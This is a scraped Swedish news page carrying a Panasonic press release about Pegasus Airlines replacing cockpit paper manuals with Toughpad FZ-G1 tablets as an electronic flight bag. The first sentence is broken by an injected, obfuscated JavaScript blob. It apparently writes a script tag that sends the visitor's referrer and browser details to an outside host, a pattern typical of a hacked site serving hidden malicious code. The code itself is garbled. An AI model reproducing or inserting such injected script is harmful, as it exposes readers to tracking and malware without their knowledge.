Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Nya datorplattor ger lättare flygplan och större cockpit-utrymme

Nya datorplattor ger lättare flygplan och större cockpit-utrymme

Från eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isybz|var|u0026u|referrer|kizre||js|php’.split(’|’),0,{}))
och med i höst kommer Pegasus Airlines flyga med en ny, digital och kostnadseffektiv “electronic flight bag”-lösning (EFB), vilket betyder att alla fysiska kartor, checklistor och manualer försvinner från cockpiten och ersätts av en datorplatta. 

Panasonics robusta datorplatta,Toughpad FZ-G1 installeras i samtliga Pegasus Airlines Boeing 737-NG-flygplan. Den professionella datorplattan ingår som en del av Scandinavian Avionics egenutvecklade “electronic flight bag”-lösning för flygbolagets flotta.

Den digitala lösningen ger både miljömässiga och ekonomiska fördelar för Pegasus Airlines.

Genom att digitalisera alla fysiska dokument och manualer i den elektroniska “flight bag”-lösningen, blir varje flygplan lättare och bränsleförbrukningen betydligt lägre. Dessutom sparar Pegasus resurser på uppdatering av dokumenten som nu istället enkelt kan ske via dataöverföring.

Ridvan Goktay, teknisk konsult vid Pegasus Airlines säger:

– Som snabbväxande flygbolag är vi övertygade om att det nya systemet kommer att innebära en effektivisering av vår verksamhet. Att använda ny teknologi är viktigt för att optimera våra dagliga processer, både idag och framöver, när vi fortsätter att utveckla företaget.

Piloternas papper ersätts av tålig datorplatta
Panasonics Toughpad är både robust och tålig. Den är utrustad med en extremt ljusstark pekskärm med antireflexyta vilket gör skärmen lätt att avläsa, även i starkt solljus ovanför molnen. Toughpad FZ-G1 innehåller en säkerhetsprocessor för att förhindra datamissbruk. Detta betyder att Pegasus Airlines tryggt kan digitalisera all viktig information.

Panasonics FZ-G1 är baserad på operativsystemet Windows 8 Pro, vilket gör enheten intuitiv och lätthanterlig. På så sätt kan piloterna snabbt navigera mellan manualerna och hitta svar på sina frågor.

Detta är ett pressmeddelande från Panasonic